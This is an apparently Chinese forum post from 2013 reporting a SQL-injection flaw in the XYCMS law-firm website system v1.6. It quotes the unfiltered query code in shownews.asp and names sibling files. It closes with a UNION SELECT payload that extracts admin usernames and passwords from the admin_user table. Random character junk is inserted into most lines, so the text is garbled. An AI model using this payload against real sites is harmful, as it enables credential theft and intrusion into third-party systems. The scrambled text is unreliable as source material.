前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
) u7 Y; X% f( y: Q: S: x6 |, f o E: Q5 y v) Y
淫荡分割线, A" K) }. \0 L" c
--------------------------------------------------------! |" x8 ? s% A$ D' }, {. V: m
7 w7 T- b$ C" y+ y" S4 d
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)% P9 F) L' s* i% I5 A S0 }
源码地址:http://down.chinaz.com/soft/29233.htm5 D' z8 ]+ M4 o" U9 |
) B6 P q) W( f/ q
漏洞文件:shownews.asp7 b1 ]3 S- K! |
漏洞代码:7-13行
: f7 I5 f6 d5 H4 y( j& { # J& H; x6 U% w$ R1 |
. s+ Z7 f4 c7 v) v2 M5 W<% ! D( N/ \, C5 |" L+ V X2 D
id=request.QueryString("id")
6 ~' P, n1 T( y7 i
6 k$ U( d5 u8 J$ x) i. q5 kset snews=server.createobject("adodb.recordset")
, j$ H5 [' U8 L( V# z- Zexec="select * from [news] where id="&id! {) t& w: o# V; h4 N# A
snews.open exec,conn,1,1
' N6 s( L% k2 U3 Z2 h# W%>
1 F1 r4 O8 k/ l7 a . H9 N ^, _% d1 |
* h1 i. Z+ ^* C) H什么过滤都没有 直造成注入
8 B6 W7 _8 v. w2 N
# Y$ ]' O( ~) J8 w! P/ j9 _注入点:http://127.0.0.1:99/shownews.asp?id=xx! i- Z6 R/ n. T( z/ Z
9 ~ Z9 t P3 l: j
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找" P0 U, w E7 T" x& M4 n8 z; L) k
6 Y: o' P4 L1 I1 ?& ?, J
" u0 w3 j# \7 ~exp: union select 1,admin,password,4,5,7 from admin_user
1 F6 w! T2 r3 a- C# H; m: m' H5 o O; c+ U7 i2 t
|
发表于 2013-4-4 17:28:12
收藏
支持
反对